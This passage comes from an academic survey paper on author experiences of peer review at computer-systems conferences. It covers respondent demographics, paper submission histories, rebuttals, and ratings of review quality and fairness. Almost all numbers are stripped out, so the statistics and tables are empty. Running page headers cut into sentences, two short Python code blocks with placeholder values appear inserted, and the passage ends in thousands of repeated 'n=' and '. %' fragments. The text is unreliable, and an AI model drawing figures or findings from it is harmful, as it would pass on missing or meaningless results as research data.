third, the effort involved in compiling all of the data in preparation for the survey took nearly a year, by which time some authors reported difficulty recalling some details, leading to fewer responses. fourth, the manual assignment of genders is a laborious process, prone to human error. however, automated approaches based on first names and country can have even higher error rates and uncertainty, especially for female and asian names (huang et al., ; karimi et al., ; mattauch et al., ). in fact, for the respondents who provided a binary gender, we found no disagreements with our manual gender assignments. last, but certainly not least, is survivorship bias. since we only polled authors of accepted papers, we have no information on all submitted papers. our survey data is insufficient to distinguish between the demographics of accepted and rejected authors, which leaves the door open to undetected biases in the peer-review process. that said, we found no difference in the demographics of accepted papers between otherwise similar conferences with double-blind or single-blind review policies. this indirect evidence reduces the likelihood that the demographic section of the survey would be answered differently for rejected papers. other survey sections on paper history and review process may prove more frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sensitive to survivorship bias. we therefore limit any conclusions we draw in this study to accepted authors only. even with this restriction, it can be instructive to compare the responses across different demographics within accepted authors. we found very few controlled studies that evaluate the peer-review process on both accepted and rejected papers, and they are typically limited in scope to one conference or journal (parno, erlingsson & enck, ; tomkins, zhang & heavlin, ). we chose an observational approach instead, which lets us examine an entire field of study, but at the cost of survivorship bias and experimental control. we believe both approaches to be complementary and valuable. ethics statement this study and the survey questions were approved by the reed college irb (number -s ). as an opt-in email survey, participants could choose to share their responses with us after they were informed of the questions and the purpose of the survey. all of the individual responses have been anonymized. the data that is shared in the supplementary material was collated and collected from publicly available sources on the web. author survey results demographic questions we asked three demographic questions to evaluate their role in the review experience. we intentionally kept these questions to a minimum to reduce the risk of priming or selection bias. which best describes your position during ? as shown in table , about one-third ( . %) of the respondents were students in , another third or so were professors of various ranks ( %), and the rest were distributed between all other categories, including unknown. for comparison, we looked at the inferred affiliation of , total authors with an identifiable email affiliation. of these, . % had an industry affiliation, compared to . % of the non-na survey respondents (χ = . , p= . ). the difference for government researchers is a little larger: . % by affiliation vs. . % among survey respondents, but still not significant enough to suggest selection bias by position (χ = . , p= . ). 
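the statistical checks quoted in this and the preceding sections (chi-squared comparisons of a group's share among respondents versus all accepted authors, the pearson correlation between per-conference response rate and median authors per paper, and the t-test comparing per-paper distributions) can be reproduced with standard scipy routines. the sketch below is illustrative only; all counts and arrays are placeholders, not the study's data.

```python
# a minimal sketch of the statistical checks reported in this study: a chi-squared test
# comparing a group's share among respondents with its share among all accepted authors,
# a pearson correlation between response rate and median authors per paper, and a t-test
# comparing two per-paper distributions. all numbers below are illustrative placeholders.
from scipy.stats import chi2_contingency, pearsonr, ttest_ind

def share_comparison(group_resp, total_resp, group_auth, total_auth):
    """Chi-squared test on a 2x2 table: group vs. non-group, respondents vs. all authors."""
    table = [[group_resp, total_resp - group_resp],
             [group_auth, total_auth - group_auth]]
    chi2, p, _, _ = chi2_contingency(table)
    return chi2, p

# e.g., industry-affiliated respondents vs. industry-affiliated authors overall
print("chi2=%.2f p=%.3f" % share_comparison(120, 918, 1400, 8000))

# response rate vs. median coauthors per paper, one value per conference
median_authors = [4, 3, 5, 4, 6]
response_rate = [0.55, 0.40, 0.62, 0.48, 0.70]
r, p = pearsonr(median_authors, response_rate)
print("pearson r=%.2f p=%.3f" % (r, p))

# survey responses per paper vs. coauthors per paper
responses_per_paper = [1, 2, 1, 1, 3, 2, 1]
coauthors_per_paper = [3, 5, 4, 2, 6, 5, 3]
t, p = ttest_ind(responses_per_paper, coauthors_per_paper)
print("t=%.2f p=%.3f" % (t, p))
```

in our data, none of these checks suggested a selection bias by position.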
systems is a field with numerous practical applications and commercial implications. it is not surprising therefore to find a large proportion of researchers in industrial and government positions, contributing to author diversity across sectors. what is your gender? among those who provided a binary response, . % chose ‘‘female’’ (table ). in our manually assigned gender data of all of the authors, % were female. these two proportions are not statistically different (χ = . , p= . ), leading us to believe that significant selection bias by gender is unlikely. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of respondent positions. response count ratio government researcher . % industry researcher . % professor . % associate professor . % assistant professor . % postdoctoral researcher . % student . % other . % na . % table respondents’ gender. response f m other na count ratio . % . % . % . % table months of research. response – – – – + na count ratio . % . % . % . % . % . % what is your english level proficiency? of the non-na respondents, % of respondents chose ‘‘native’’ for their english level proficiency. there appears to be no gender or position difference in the response to this question. we also asked (and checked) for each paper whether there was any native english speaker among its coauthors. from this question, we estimate that approximately % of papers had at least one native-speaking author. paper history how many months did it take to research and write? the responses to this question (table ) exhibited more variance among different coauthors of the same paper than any other question, although typically by no more than months. the response to this question was not significantly associated with the team size (number of coauthors) or lead author’s experience, gender, or sector. how many conferences/journals was it submitted to prior to this publication? it is instructive to see that at least % of papers with responses had been rejected at least once (solomon, ; wallach, ), with one respondent taking as many as attempts to reach publication (table ). we also observed a tendency of papers with a frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table number of paper’s prior submissions. response + na count ratio . % % . % . % % . % . % figure prior submission counts for architecture conferences. arrows show in relative thickness and attached number how many papers that had been rejected in the top row’s conference were accepted in the bottom row’s conference. for example, papers that had been rejected from isca were accepted to hpca in , out of the hpca’ papers for which we have responses. full-size doi: . /peerjcs. /fig- longer submission history of having a longer research history (previous question), perhaps conflating the two variables in respondents’ mind. please type in their names [of the rejecting conferences] because of the unstructured responses to this question, quantitative analysis is challenging. as an example, we focus our attention on the area of computer architecture alone. four of the leading conferences are represented in our dataset and are of similar size and acceptance rates. we note that most papers that had been previously rejected from these conferences, had been mostly submitted to one of these four as well. as fig. 
shows, these relationships work both ways, meaning that many papers were accepted after previously being rejected from equivalent (or even the very same) conferences. this fact can be interpreted both positively and negatively. some respondents expressed frustration that the peer-review process can appear arbitrary (anderson, ; françois, ; gans & shepherd, ; lawrence & cortes, ; vardi, ; vines, ). other authors opined that effective peer review provides feedback that improves the paper for the next submission. most of the papers had been rejected at least once prior to their acceptance in , which perhaps helps to explain why authors’ views on the process were mixed. this fact could also support an argument that selection bias in this survey played a lesser role in painting authors’ reported experience one way or another, because even though these are all accepted authors, most of them experienced the rejection of the subject paper as well. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. rebuttal process did the conference allow you to address reviewers concerns before final acceptance notice? of the non-na responses, . % chose ‘‘yes.’’ contrast this with the conferences, of which only offered a formal rebuttal option ( . % when weighted by papers). the discrepancy may be explained by some authors who specifically explained answering ‘‘yes’’ to this question despite the lack of a formal rebuttal policy, because the conference had a ‘‘provisional acceptance’’ policy or mandatory revisions guided by a pc ‘‘shepherd.’’ although this response type is clearly different than a formal rebuttal, limiting our analysis to only formal rebuttals does not meaningfully change our results. approximately . % of the ‘‘yes’’ respondents also reported that they took advantage of the rebuttal option. the few who did not take advantage received higher overall acceptance score on average, ( . % vs. . %, t =− . , p= . ), possibly obviating the need to rebut (daume, ). there were no statistically significant differences in responses to this question by position, english proficiency, or gender, although only men chose not to rebut ( authors, χ = . , p= . ). these men appear slightly less experienced than their peers, with a median h-index of , compared to for all authors, (t =− . , p= . ) and are mostly academics ( authors). however, the group is probably too small to characterize it conclusively. did you find the response process helpful? of the non-na responses, . % were affirmative. this high percentage may be a little surprising, considering how many pc chairs and authors alike commented privately on how little difference rebuttals make (daume, ; shah et al., ). one cautionary reminder is that the survey and statistics exclude rejected papers, which could lead to survivorship bias. it is quite plausible that authors of rejected papers were less enthused about the rebuttal process. however, even among authors of accepted papers there are some noteworthy differences between those who found rebuttals valuable and those who did not. professors comprise only % of the respondents who found rebuttals helpful, compared to % among those who did not (χ = . , p= . ). in contradistinction, students found rebuttals more helpful ( % vs. %, χ = . , p= . ), perhaps because of their lack of experience. junior researchers possibly also feel more pressure to bring their paper to publication than tenured and senior researchers. 
more generally, the experience level of authors who found rebuttals helpful, as measured by median publications count in their gs profile, is about half that of those who did not ( vs. , t = . , p= . ). we have also collected information on which authors serve on pcs in any of our conferences, as another measure of experience. this information agrees with the previous metric. authors satisfied with the rebuttal process serve on an average of . pcs, compared to . pcs for authors who were not (t = . , p= . ), which is consistent with the mixed opinions we got directly from pc chairs on the question of rebuttals. frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table number of reviews received per paper. response + na count ratio . % . % . % . % . % . % . % . % nonnative english speakers were also more likely to find the rebuttals helpful ( % vs. %, χ = . , p= . ), perhaps because it allowed them to address gaps in communication. this difference also extends weakly to the entire team: % of responses where no team member was a native english speaker found the rebuttal helpful, vs. % in responses from the other teams. rebuttal helpfulness does appear to be related to the conference. when limiting ourselves to the eleven conferences that had a formal rebuttal process and at least ten unique authors responding to this question, three conferences had higher-than-average dissatisfaction rate with the rebuttal process: asplos, isc, and sosp. conversely, in four conferences, no more than % of respondents were dissatisfied with the rebuttals: micro, ppopp, sc, and pldi. when asked to explain their previous answer, the respondents varied. the main themes that emerged from the positive responses were that rebuttals allowed for clarifications, increased review scores, and improved the communication of specific points in the paper. one pc chair also thought rebuttals elicit better initial reviews and better pc discussion. the main negative themes were that rebuttals rarely change reviewers’ minds and that the process was still opaque and arbitrary. review quality assessment the following questions, one per review and paper, were designed to assess the quality of the reviews. how many reviews did this paper receive? the papers in our dataset average more than four reviews per paper (table ), far better than the typical + reviews in an average cs journal (clarivate analytics, , p. ). this could partially explain the attractiveness of conferences over journals, at least in systems. authors were also asked to qualitatively approximate how long each review was (table ). it is encouraging to find over half of the non-na responses showing one or more pages per review, whereas only approximately . % of reviews were reported to be less than half a page. how well did the reviewer understand the paper, in your estimation? of the minority of reviews that missed major points or worse (table ), . % were short, spanning half a page or less. this correlation demonstrates the relationship between review quality and length (χ = . , p < . ) (hames, ; papagiannaki, ). still, longer is not always better or necessary, as these short reviews still comprise . % of the ‘‘perfect understanding’’ reviews, whereas multipage reviews only comprise . %. as for paper history, the better-understood papers appear to have had a longer history in terms of prior submissions (t = . , p= . ), as well as in terms of months researched. frachtenberg and koster ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of review lengths. response count ratio - paragraphs . % half a page . % a page . % multiple pages . % na . % table reviewer understanding. response count ratio perfectly . % missed some minor points . % misunderstood major points . % probably didn’t read it . % na . % table review helpfulness. response count ratio very helpful . % somewhat helpful . % not at all . % conceivably, previous rejections have helped improve the communication of a resubmitted paper. how helpful did you find this review for improving the paper? table shows that accepted authors found most of their reviews at least somewhat helpful. the helpfulness of a review is closely linked to its reported level of understanding (χ = . ,p< . ), which in turn also implies that it is closely linked to the review’s length (χ = , p< . ). this result is consistent with other surveys of journal authors (editage insights, ; sense about science, ). how fair would you say the review was? fairness in reviews is a high priority for the systems community (jerger et al., ), and most of our respondents thought their reviews were fair (table ). once more, the perception of a review’s fairness is closely tied to that of the reviewer’s understanding (χ = . , p< . ) and helpfulness (χ = . , p< . ). only of non-na responses ( . %) ranked a review as ‘unfair’ or ‘very unfair.’ however, this relatively low number may be distorted by survivorship bias more than for any other question in this survey. of these responses, sosp stands out as the conference with most ‘unfair’ reviews ( , or . %) and icpe as the conference with the highest percentage ( , or . %). one other notable aspect of these negative responses is that only one came from a woman ( . %). frachtenberg and koster ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table review fairness. response count ratio fair . % somewhat fair . % unfair . % very unfair . % review scores we asked respondents to upload their reviews’ text or to fill in the actual scores that they received in the reviews of up to six reviews per paper and in seven different categories, when applicable. not all of the conferences require all categories in their review forms, and the conferences do not all use consistent wording, so we chose whichever one of the seven categories appeared closest in meaning to the conference’s form. these categories generally stand for the following: . overall score or acceptance recommendation (often ranging from ‘‘strong reject’’ to ‘‘strong accept’’). . technical merit or validity of the work. . presentation quality, writing effectiveness, and clarity. . foreseen impact of the work and potential to be of high influence. . originality of the work, or conversely, lack of incremental advance. . relevance of the paper to the conference’s scope. . confidence of the reviewer in the review. all scores were normalized so that the lowest grade in a category always received and the highest always . the distributions of these normalized scores are depicted in fig. . keep in mind, however, that the transcription of reviews, scaling, and calibration process were error-prone, possibly introducing some noise to these responses. not surprisingly, all of the papers average above % for all of the scores—after all, the papers have all been accepted (langford, ; vines, ). the interquartile range for the overall grade is . – . 
, meaning that half of the papers probably got accepted with an overall recommendation somewhere between ''weak accept'' and ''accept.'' perhaps more surprisingly, approximately % of the papers were accepted despite a low (< . average) acceptance recommendation, and approximately % of the accepted papers had low reviewer confidence (< . average). however, the confidence ranking may be related to the seniority of the reviewer rather than the quality of the paper itself, leading to wider variance (shah et al., ). it is illuminating to see that there is no correlation between a paper's overall grade and the number of past rejections (r =− . , p= . ). if multiple submissions do indeed improve a paper's quality, as we suggested in the understanding question, they appear to only bring it to the same level of evaluation as other accepted papers in the same conference. once the paper is accepted, the improvement process is presumably halted. another observation is that the ''relevance'' grade may be mostly irrelevant, both because of its narrow distribution and because of the low number of conferences that ask for it.

figure : distributions of the normalized review scores in each of the seven categories.
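the per-category normalization described above is a simple min-max rescaling of each review grade onto [0, 1]. the sketch below shows the computation with illustrative scale bounds, since each conference defines its own grading range.

```python
# a minimal sketch of the per-category score normalization: each review grade is
# rescaled so the lowest possible grade of its scale maps to 0 and the highest to 1.
# the scale bounds below are illustrative; conferences used different ranges.
def normalize(score, lo, hi):
    """Map a raw review grade on the scale [lo, hi] to [0, 1]."""
    if hi == lo:
        raise ValueError("degenerate scale")
    return (score - lo) / (hi - lo)

# e.g., an overall recommendation of 4 on a 1-5 scale, and a 7 on a 1-9 scale
print(normalize(4, 1, 5))   # 0.75
print(normalize(7, 1, 9))   # 0.75
```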
n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= 
n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= 
n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= n= . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . 
% . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % 